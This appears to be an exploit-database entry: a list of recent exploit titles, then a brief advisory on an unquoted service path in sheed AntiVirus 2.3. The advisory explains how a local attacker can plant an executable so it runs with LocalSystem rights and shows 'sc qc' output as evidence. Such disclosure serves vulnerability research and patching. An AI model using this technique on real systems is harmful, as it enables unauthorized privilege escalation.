
12 new exploits Linux Kernel 4.6.2 (Ubuntu 16.04.1) - IP6T_SO_SET_REPLACE Privilege Escalation Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Privilege Escalation Spacemarc News - Cross-Site Request Forgery (Add New Post) Minecraft Launcher - Insecure File Permissions Privilege Escalation BirdBlog 1.4.0 - (Add New Post) Cross-Site Request Forgery phpEnter 4.2.7 - (Add New Post) Cross-Site Request Forgery sheed AntiVirus - Unquoted Service Path Privilege Escalation AVTECH IP Camera_ NVR_ and DVR Devices - Multiple Vulnerabilities RSA Enterprise Compromise Assessment Tool 4.1.0.1 - XML External Entity Injection Android - 'gpsOneXtra' Data Files Denial of Service Linux Kernel 3.13.1 - Recvmmsg Privilege Escalation (Metasploit) Allwinner 3.4 Legacy Kernel - Local Privilege Escalation (Metasploit) ApPHP MicroBlog 1.0.2 - Stored Cross Site Scripting ApPHP MicroBlog 1.0.2 - Cross-Site Request Forgery (Add New Author)
29 lines
1.2 KiB
Text
Executable file
29 lines
1.2 KiB
Text
Executable file
#########################################################################
|
|
# Exploit Title: sheed AntiVirus Unquoted Service Path Privilege Escalation
|
|
# Date: 11/10/2016
|
|
# Author: Amir.ght
|
|
# Vendor Homepage: http://sheedantivirus.ir/
|
|
# Software Link:http://dl.sheedantivirus.ir/setup.exe
|
|
#version : 2.3 (Latest)
|
|
# Tested on: Windows 7
|
|
##########################################################################
|
|
|
|
sheed AntiVirus installs a service with an unquoted service path
|
|
To properly exploit this vulnerability,
|
|
the local attacker must insert an executable file in the path of the service.
|
|
Upon service restart or system reboot, the malicious code will be run
|
|
with elevated privileges.
|
|
-------------------------------------------
|
|
C:\>sc qc ShavProt
|
|
[SC] QueryServiceConfig SUCCESS
|
|
|
|
SERVICE_NAME: ShavProt
|
|
TYPE : 110 WIN32_OWN_PROCESS (interactive)
|
|
START_TYPE : 2 AUTO_START
|
|
ERROR_CONTROL : 0 IGNORE
|
|
BINARY_PATH_NAME : C:\Program Files\Sheed AntiVirus\shgrprot.exe
|
|
LOAD_ORDER_GROUP :
|
|
TAG : 0
|
|
DISPLAY_NAME : ShavProt
|
|
DEPENDENCIES :
|
|
SERVICE_START_NAME : LocalSystem
|